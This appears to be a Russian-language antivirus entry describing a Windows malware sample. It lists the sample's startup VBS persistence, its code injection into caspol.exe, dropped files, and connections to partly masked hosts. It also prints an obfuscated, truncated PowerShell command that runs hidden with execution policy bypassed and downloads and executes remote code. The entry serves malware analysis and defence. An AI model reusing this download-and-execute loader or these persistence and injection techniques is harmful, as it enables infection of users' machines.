Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\run.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\catalog.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\storage.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bin
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bak
Удаляет следующие файлы
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bak
Сетевая активность
TCP
- 'gi##.###hubusercontent.com':443
- 'xc####.myq-see.com':9955
UDP
- DNS ASK gi##.###hubusercontent.com
- DNS ASK xc####.myq-see.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((n`e`W`-Obj`E`c`T (('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'r'+'i'+'...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'
